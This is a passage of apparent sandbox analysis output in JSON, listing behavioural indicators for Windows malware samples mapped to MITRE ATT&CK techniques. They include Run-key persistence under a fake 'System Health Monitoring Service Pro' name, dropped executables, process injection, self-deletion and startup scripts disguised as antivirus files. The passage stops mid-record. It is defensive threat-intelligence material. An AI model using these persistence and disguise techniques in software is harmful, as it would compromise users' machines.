\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00002968)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" queries volume information of \"C:\\\" at 00000000-00004900-0000010C-222730\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002968-0000010C-236637\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002940-0000010C-517840", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000007400906c74008b6c7400000000000000000000007100000000019cdd22000000000000eb220095e107771ed80500feffffff435c0b7750590b77aa000000b80000008a6c7400886c740024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5c0a7760d82275ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ed0b77b26c7400a06ae1748600000024df22005ce322000000000086008800a06ae17424df2200916ce174b26c7400a06ae174a06ae17494e3220002020000 (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004900)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000f01d3100eb1d3100000000000000000000002e00000000019cdc22000000000000ea220095e107774ddd0500feffffff435c0b7750590b77aa000000b8000000ea1d3100e81d310024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5c0a7760d82275ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ed0b77121e3100a06ae1748600000024de22005ce222000000000086008800a06ae17424de2200916ce174121e3100a06ae174a06ae17494e2220002020000 (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf000c77d6000c77d13a2c7770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00002968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" queries volume information of \"C:\\\" at 00000000-00004900-0000010C-222730\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002968-0000010C-236637\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002940-0000010C-517840", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00004900)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: 94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: 94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has a section named \".eh_fram\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002940]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" wrote 15980 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 192)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 192)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 192)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4
https://hybrid-analysis.com/sample/11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4
Hybrid Analysis - Ransomware
{"size": 3181056, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4", "sha256": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4", "av_detect": 91, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 4, "total_signatures": 209, "extracted_files": [{"name": "Antivirus.bat", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus.bat", "file_size": 169746, "sha256": "baa3bfb404c663a5a813475773b4b4d479ceb8f1cf02dec627591284b959a343", "type_tags": ["text"], "description": "DOS batch file, ASCII text, with very long lines (844), with CRLF line terminators", "runtime_process": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe (PID: 5932)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Antivirus2.vbs", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs", "file_size": 3419, "sha256": "dc98a3995c8c9db2897b3dcd603d0a55e9d6b42cb3900f9b5666dbb461172197", "type_tags": ["text"], "description": "ISO-8859 text, with CRLF line terminators", "runtime_process": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe (PID: 5932)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Antivirus3.vbs", "file_path": 